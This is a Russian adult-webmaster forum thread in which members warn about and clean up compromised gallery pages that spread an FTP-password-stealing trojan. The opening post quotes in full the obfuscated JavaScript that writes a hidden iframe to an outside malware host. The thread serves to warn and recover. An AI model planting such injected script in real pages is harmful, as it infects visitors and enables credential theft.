Реклама на сайте Advertise with us

Овнерам и Постерам!!! Ахтунг!!!

Расширенный поиск по форуму
 
Новая тема Новая тема   
Автор
Поиск в теме:

Old Oil Barrel

С нами с 09.09.04
Сообщения: 58531
Рейтинг: 14265


Передовик Master-X (16.07.2005) Передовик Master-X (16.10.2005) Передовик Master-X (01.12.2006) Передовик Master-X (01.03.2007) Передовик Master-X (16.03.2007) Ветеран трепа Master-X ()
Ссылка на сообщениеДобавлено: 27/03/07 в 19:09       Ответить с цитатойцитата 

С фрихов при загрузке выполняется Джава код грузит троян, который ворует пароли от ФТП

http://www.momsforyou.com/xxx/latina-milf/mom-mature/
http://www.lesbiansplanet.com/girls/perfect-smooth-bodies/lesbian-ass/

Цитата:
<!-- ~ --><SCRIPT LANGUAGE="JavaScript">
<!--
function Decode(){var temp="",i,c=0,out="";var str="60!105!102!114!97!
109!101!32!115!114!99!61!
34!104!116!116!112!58!47!47!
115!115!115!55!46!105!110!102!111!47!
116!100!115!47!105!110!46!99!103!105!63!50!
34!32!119!105!100!116!104!61!34!49!34!32!104!101
!105!103!104!116!61!34!49!34!62!60!47!105!102!
114!97!109!101!62!";l=str.length;while(c<=str.length-1)
{while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;
out=out+String.fromCharCode(temp);temp="";}document.write(out);}
//-->
</SCRIPT><SCRIPT LANGUAGE="JavaScript">
<!--
Decode();
//-->
</SCRIPT>


Без гандонов не входить, некоторые долго потом комп чистили, антивири его не видят

Владелец этого домена или не видит или мудак редкостный так как продолжает постить

Есть возможно еще фрихи

Последний раз редактировалось: Sergeyka (28/03/07 в 10:18), всего редактировалось 3 раз(а)

Правило буравчика

0
 



С нами с 14.04.04
Сообщения: 1657
Рейтинг: 402

Ссылка на сообщениеДобавлено: 27/03/07 в 19:25       Ответить с цитатойцитата 

Sergeyka: еще вот эти два домена:

see-her-squirt.biz
beautylatinas.com

у меня улетели седня в бан

8
 

Old Oil Barrel

С нами с 09.09.04
Сообщения: 58531
Рейтинг: 14265


Передовик Master-X (16.07.2005) Передовик Master-X (16.10.2005) Передовик Master-X (01.12.2006) Передовик Master-X (01.03.2007) Передовик Master-X (16.03.2007) Ветеран трепа Master-X ()
Ссылка на сообщениеДобавлено: 27/03/07 в 19:26       Ответить с цитатойцитата 

Вика спасибо, народ как лечить этого пидара не видят антивири его icon_sad.gif
Где сидит процесс что запускает файлы?

Файлы находяться в корне диска с

Правило буравчика

0
 

Деньги из воздуха...

С нами с 26.09.04
Сообщения: 3797
Рейтинг: 2283

Ссылка на сообщениеДобавлено: 27/03/07 в 19:33       Ответить с цитатойцитата 

Взлом с 75.126.21.163
Овнеры этих доменов у нас все сидят. Уже пофиксили все.

Обмен Epass - Fet - Wmz - PayPal(!!) - Wire
Свежий юмор на моем ресурсе || Книжный интернет магазин

8
 

Old Oil Barrel

С нами с 09.09.04
Сообщения: 58531
Рейтинг: 14265


Передовик Master-X (16.07.2005) Передовик Master-X (16.10.2005) Передовик Master-X (01.12.2006) Передовик Master-X (01.03.2007) Передовик Master-X (16.03.2007) Ветеран трепа Master-X ()
Ссылка на сообщениеДобавлено: 27/03/07 в 19:36       Ответить с цитатойцитата 

когда вы пофиксили, сходи по линке

Блин, еще бы научили как лечиться теперь?

Правило буравчика

0
 

Old Oil Barrel

С нами с 09.09.04
Сообщения: 58531
Рейтинг: 14265


Передовик Master-X (16.07.2005) Передовик Master-X (16.10.2005) Передовик Master-X (01.12.2006) Передовик Master-X (01.03.2007) Передовик Master-X (16.03.2007) Ветеран трепа Master-X ()
Ссылка на сообщениеДобавлено: 27/03/07 в 19:57       Ответить с цитатойцитата 

забавно сука эта хуета сама себя прописала в брэндмауэр виндоса типа разрешено с него урлы отправлять, вроде убил но не уверен, не нашел где сидит эта сука

Правило буравчика

0
 

Деньги из воздуха...

С нами с 26.09.04
Сообщения: 3797
Рейтинг: 2283

Ссылка на сообщениеДобавлено: 27/03/07 в 20:50       Ответить с цитатойцитата 

hotsianbabes.com
lesbiansplanet.com
С этими доменами ситуация следующая.
Юзерами не были созданы бекапы, потому можно домены из листинга удалить, содержимое удаляется в данный момент под чистую, разбираться мне лень. Пароли сменены.
Овнерам
Ребята, приносим свои извинения, данная хрень почти сразу была обнаружена, мы бросили все и оперативно востановили все что смогли, не смотря на накрытый стол и ДР одного из коллег icon_smile.gif. В данный момент админы проверяют все что можно. Что вызывает подозрения сносим нафиг.
Банить постеров или не банить дело Ваше...
Спасибо за понимание, всю инфу буду постить по мере ее поступления.
Еще раз приношу свои извинения.

Обмен Epass - Fet - Wmz - PayPal(!!) - Wire
Свежий юмор на моем ресурсе || Книжный интернет магазин

8
 

full-plastic programmist

С нами с 05.09.03
Сообщения: 8361
Рейтинг: 4779

Ссылка на сообщениеДобавлено: 27/03/07 в 21:08       Ответить с цитатойцитата 

вот еще пара доменов:
http://www.onlychubbypics.com/bbw/heavy-breasted-beauty/nude-bbw/
http://www.hotsianbabes.com/asia/kinky-asian-teen/asian-woman/
что забавно - на старых фрихах ифрейма нет...

вот соскучился по мастеру...

8
 

Деньги из воздуха...

С нами с 26.09.04
Сообщения: 3797
Рейтинг: 2283

Ссылка на сообщениеДобавлено: 27/03/07 в 21:11       Ответить с цитатойцитата 

http://www.onlychubbypics.com/bbw/heavy-breasted-beauty/nude-bbw/
восстановлен из бекапа. Все в порядке. Или я не все вижу?
hotsianbabes.com хтмл.

Обмен Epass - Fet - Wmz - PayPal(!!) - Wire
Свежий юмор на моем ресурсе || Книжный интернет магазин

8
 



С нами с 07.10.03
Сообщения: 5194
Рейтинг: 3325


Передовик Master-X (16.07.2014)
Ссылка на сообщениеДобавлено: 27/03/07 в 21:14       Ответить с цитатойцитата 

да блин со многих сайтов грузится экзешник, дрочам думаю пофиг , они не заметят но что он делает на компе при автозапуске х.е.з

8
 



С нами с 06.03.05
Сообщения: 6216
Рейтинг: 7375


Передовик Master-X (01.02.2007) Передовик Master-X (16.02.2007) Передовик Master-X (01.04.2007) Передовик Master-X (01.05.2007) Передовик Master-X (01.10.2007) Ветеран трепа Master-X ()
Ссылка на сообщениеДобавлено: 27/03/07 в 22:10       Ответить с цитатойцитата 

сенкс за инфу, так что теперь с этими доменами делать? сносить их из бд?

8
 



С нами с 18.04.05
Сообщения: 3728
Рейтинг: 4605

Ссылка на сообщениеДобавлено: 27/03/07 в 22:11       Ответить с цитатойцитата 

Ну так теперь всё нормально или как?

Дизайн, 30$-cjtube

8
 

Деньги из воздуха...

С нами с 26.09.04
Сообщения: 3797
Рейтинг: 2283

Ссылка на сообщениеДобавлено: 27/03/07 в 22:28       Ответить с цитатойцитата 

В данный момент удален контент полностью с доменов
hotsianbabes.com
lesbiansplanet.com
так как там не было сделано юзерами бекапов.
На всех остальных серверах все восстановлено из бекапов и в данный момент вообще выключен доступ по ФТП для всех пользователей от греха подальше. До момента выяснения каким образом ушли пароли я его открывать не буду никому icon_smile.gif.
Такая ситуация не у нас одних, всем нашим партнерам я стукнул в аську и уведомил о ситуации. Кто не получил мессагу из наших партнеров стучите мне я дам все разъяснения.

Обмен Epass - Fet - Wmz - PayPal(!!) - Wire
Свежий юмор на моем ресурсе || Книжный интернет магазин

8
 



С нами с 02.07.04
Сообщения: 495
Рейтинг: 345

Ссылка на сообщениеДобавлено: 27/03/07 в 22:38       Ответить с цитатойцитата 

У меня тоже эта хрень, прошу овнеров не выкидывать из базы фрихи с доменов:
_sugaryteen.com/
_enamoure.com/
_wetoasis.com/
_exoticwish.com/
_exoticsea.com/
_ethnicisle.com/
_ethnic-hotel.com/
_ethnicangel.com/
_exoticflame.com/
_myethnicgirls.com/
_exotic-land.com/
_honeyfree.com/
_wetforest.com/

Сейчас разбираемся.

Последний раз редактировалось: eger (30/03/07 в 13:36), всего редактировалось 1 раз

8
 



С нами с 06.03.05
Сообщения: 6216
Рейтинг: 7375


Передовик Master-X (01.02.2007) Передовик Master-X (16.02.2007) Передовик Master-X (01.04.2007) Передовик Master-X (01.05.2007) Передовик Master-X (01.10.2007) Ветеран трепа Master-X ()
Ссылка на сообщениеДобавлено: 27/03/07 в 22:41       Ответить с цитатойцитата 

а в чем уязвимость не определили еще? если тока html то нет опасений?

8
 

Деньги из воздуха...

С нами с 26.09.04
Сообщения: 3797
Рейтинг: 2283

Ссылка на сообщениеДобавлено: 27/03/07 в 22:46       Ответить с цитатойцитата 

Дело не в серверах, дело в троянах на локале. Какие трояны угнали пароли пока выясняем. Вот я отписал
Взлом с 75.126.21.163
eger бро, удачно тебе восстановить все.

Обмен Epass - Fet - Wmz - PayPal(!!) - Wire
Свежий юмор на моем ресурсе || Книжный интернет магазин

8
 

Раздаю инвайты, ищу линк-трейд

С нами с 20.08.04
Сообщения: 16626
Рейтинг: 8593


Передовик Master-X (16.11.2006) Передовик Master-X (01.09.2019)
Ссылка на сообщениеДобавлено: 27/03/07 в 22:55       Ответить с цитатойцитата 

Те, кто фрихи проверял - проверьте свои хосты (индексные файлы)

Кому ссылку?
RU и EN Dating

8
 

XXX-Server.biz

С нами с 15.02.03
Сообщения: 9411
Рейтинг: 6676


Передовик Master-X (16.01.2008)
Ссылка на сообщениеДобавлено: 27/03/07 в 22:59       Ответить с цитатойцитата 

кто-нибудь - если удастся вытащить вирь, отошлите производетелям антивирей.... а то чувствую это надолго все...

Хостинг от $0.05/Gb, VDS от 9$, Dedicated Servers от $49
Домены от 4.99$

0
 



С нами с 07.10.03
Сообщения: 5194
Рейтинг: 3325


Передовик Master-X (16.07.2014)
Ссылка на сообщениеДобавлено: 27/03/07 в 23:10       Ответить с цитатойцитата 

pierx писал:
Те, кто фрихи проверял - проверьте свои хосты (индексные файлы)


а что там должно быть ?


лучше проверьте C:/ , там файлы типа FKJGHT.exe
если фиревол не стоял значит ушла инфа о вас, каспер, нод сасут...

8
 

Деньги из воздуха...

С нами с 26.09.04
Сообщения: 3797
Рейтинг: 2283

Ссылка на сообщениеДобавлено: 27/03/07 в 23:17       Ответить с цитатойцитата 

exe размером 24605 байт ищите. пока все кто писал такой размер говорят. Но это уже в результате взлома грузили, куда ушли пароли пока не ясно. Касперскому отправили файлы.

Обмен Epass - Fet - Wmz - PayPal(!!) - Wire
Свежий юмор на моем ресурсе || Книжный интернет магазин

8
 



С нами с 10.12.03
Сообщения: 1615
Рейтинг: 870

Ссылка на сообщениеДобавлено: 27/03/07 в 23:20       Ответить с цитатойцитата 

угу. тоже седня такой код на 1 фрихе видел

8
 

Раздаю инвайты, ищу линк-трейд

С нами с 20.08.04
Сообщения: 16626
Рейтинг: 8593


Передовик Master-X (16.11.2006) Передовик Master-X (01.09.2019)
Ссылка на сообщениеДобавлено: 27/03/07 в 23:22       Ответить с цитатойцитата 

Сергейка, покоцай код пробелами - читать невозможно

Кому ссылку?
RU и EN Dating

8
 



С нами с 07.10.03
Сообщения: 5194
Рейтинг: 3325


Передовик Master-X (16.07.2014)
Ссылка на сообщениеДобавлено: 27/03/07 в 23:26       Ответить с цитатойцитата 

ritor писал:
exe размером 24605 байт ищите. пока все кто писал такой размер говорят. Но это уже в результате взлома грузили, куда ушли пароли пока не ясно. Касперскому отправили файлы.


а откуда пароли уходят и какие имено ?

8
 

Деньги из воздуха...

С нами с 26.09.04
Сообщения: 3797
Рейтинг: 2283

Ссылка на сообщениеДобавлено: 27/03/07 в 23:38       Ответить с цитатойцитата 

sexogen писал:
а откуда пароли уходят и какие имено ?

По моим данным и данных тех кто мне стучал в аську, ушли пароли к ФТП. Оффтопик: А скрипт с айпишника 75.126.21.163 ходил по доменам, ставил редирект, зачем то залил мне чужого файла, доров каких то. много перепутал. На все наши серчфиды тоже поставлен был редирект.
4 домена наших партнеров с 300К ТГП трафа и акками полностью на экспы редиректило ну и в таком духе, дедик с сиджами успели закрыть.

так вот по опросу почти все кто попал пароли хранили в клиентах ФТП. по наличию троянов щас все усиленно проверяются, но пока безрезультатно.

Обмен Epass - Fet - Wmz - PayPal(!!) - Wire
Свежий юмор на моем ресурсе || Книжный интернет магазин

8
 



С нами с 07.10.03
Сообщения: 5194
Рейтинг: 3325


Передовик Master-X (16.07.2014)
Ссылка на сообщениеДобавлено: 27/03/07 в 23:41       Ответить с цитатойцитата 

так есть ведь разные клиенты FTP , какой софт вы юзали , как конектились ? или где хранились пароли

каким браузером пользовались, версия.

нет смысла менять пароль если не установлен путь проникновения, угонят к ебеням повторно

ЗЫ
короче надо покупать корманый компутар специально для паролей
и к никаким сетям его не подрубать

зыы
и ставим софт http://www.dfservice.com/site-monitor/index.html.ru.htm для мониторинга сайтоф

8
 
Новая тема Новая тема   

Текстовая реклама в форме ответа
Заголовок и до четырех строчек текста
Длина текста до 350 символов
Купить рекламу в этом месте!


Перейти:  



Спонсор раздела Стань спонсором этого раздела!

Реклама на сайте Advertise with us

Опросы

Рецепт новогоднего блюда 2022



Обсудите на форуме обсудить (11)
все опросы »